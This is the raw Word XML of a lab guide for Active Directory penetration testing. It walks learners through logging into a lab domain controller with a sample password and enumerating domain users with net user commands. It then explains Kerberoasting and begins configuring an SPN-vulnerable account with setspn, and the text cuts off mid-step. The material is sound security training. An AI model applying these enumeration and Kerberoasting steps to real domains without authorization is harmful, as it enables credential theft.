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72AC0" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="007936"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Active Directory Pen Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE00ACD" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="007936"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="FFFFFF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2 Hours Remaining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A0B2879" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>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t>Instructions Resources </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Help</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>  100</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C872A" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">
      <w:pPr>
        <w:widowControl/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="11" w:color="000000"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="300" w:after="300"/>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="36"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
        <w:t>Appendix I: Active Directory Pen Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A54F6" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Exercise 1: Exploring the Active Directory Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1A4134" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40442794" w14:textId="77777777" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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t>In this lab, you will work in an Active Directory domain and practice methods and techniques of information discovery and enumeration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AF41BE" w14:textId="47466643" w:rsidR="00D05942" w:rsidRPr="00D05942" w:rsidRDefault="00D05942" w:rsidP="00D05942">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0E9A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20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId6" w:name="DefaultOcxName" w:shapeid="_x0000_i1357"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>By default </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00D05942">
          <w:rPr>
            <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
            <w:color w:val="0067B8"/>
            <w:kern w:val="0"/>
            <w:szCs w:val="21"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>2019DC</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> machine is selected, click </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>HYPERLINK "https://labclient.labondemand.com/Instructions/27a69232-3147-4622-a040-37f066689f87?rc=10"</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="0067B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:u w:val="single"/>
          <w:bdr w:val="single" w:sz="6" w:space="2" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Ctrl+Alt+Delete</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B79DBDC" w14:textId="6B7A684D"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4EEBB053" wp14:editId="231804BC">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1233237451" name="図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5CF4457C" w14:textId="669FC55E"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2D84C46">
          <v:shape id="_x0000_i1356" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId9" w:name="DefaultOcxName1" w:shapeid="_x0000_i1356"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Pa$$w0rd</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> to login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221A9997" w14:textId="75BA754A"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7EF2F763" wp14:editId="19D0AE46">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="871792383" name="図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7182ECC6" w14:textId="540AD5C9"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A0988A0">
          <v:shape id="_x0000_i1355" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId11" w:name="DefaultOcxName2" w:shapeid="_x0000_i1355"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>First, we will review the commands for getting information about the domain in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>command prompt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> window. Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This will return the users on the machine, as shown in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C26D9A" w14:textId="15006E3B"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6ACB3F1C" wp14:editId="4CE1FF00">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2058083366" name="図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2BF38896" w14:textId="6AB5591D"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1240FEF9">
          <v:shape id="_x0000_i1354" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId13" w:name="DefaultOcxName3" w:shapeid="_x0000_i1354"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next, to look closer at the domain, type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>net user /domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. This will show all users from the group in the Active Directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB9B97" w14:textId="7CC90B26"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62825C37" wp14:editId="4C97F619">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="776612782" name="図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761CB310" w14:textId="756EE9F6"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E1887F1">
          <v:shape id="_x0000_i1353" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId15" w:name="DefaultOcxName4" w:shapeid="_x0000_i1353"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>To see the user group, we can add the user to the command. Type </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>net user user-one /domain</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. An example of the output of this command is shown in the screenshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460E6A64" w14:textId="06BB9D95"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E23F9D9">
          <v:shape id="_x0000_i1352" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId16" w:name="DefaultOcxName5" w:shapeid="_x0000_i1352"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>As the screenshot shows, a long list of information can be extracted about the users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321468A7" w14:textId="1582C32E"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5534D6BE" wp14:editId="1CA232C7">
            <wp:extent cx="5400040" cy="3035935"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="911200057" name="図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53FF9ED7" w14:textId="4DBB5BC6"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71F19DA">
          <v:shape id="_x0000_i1351" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId18" w:name="DefaultOcxName6" w:shapeid="_x0000_i1351"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Next, we are ready to explore some aspects that make the Active Directory environment ripe for testing. The Microsoft implementation of Kerberos can be slightly complicated, but the gist of the attack is that it takes advantage of legacy Active Directory support for older Windows clients, the type of encryption used, and the key material used to encrypt and sign Kerberos tickets. Essentially, when a domain account is configured to run a service in an environment such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>MS SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Service Principal Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> (SPN) is used in the domain to associate the service with a login account. When a user wishes to use a specific resource, they receive a Kerberos ticket signed with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> hash of the account that is running the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107D8596" w14:textId="421F8936"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2F2FB070">
          <v:shape id="_x0000_i1350" type="#_x0000_t75" style="width:20.4pt;height:16.1pt" o:ole="">
            <v:imagedata r:id="rId5" o:title=""/>
          </v:shape>
          <w:control r:id="rId19" w:name="DefaultOcxName7" w:shapeid="_x0000_i1350"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We are now ready to setup a vulnerable account using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setspn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. Type </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>setspn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="007F00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s http/LPT.com:80 user-one</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> and press </w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Enter</w:t>
      </w:r>
      <w:r w:rsidRPr="00D05942">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="ＭＳ Ｐゴシック" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="000000"/>
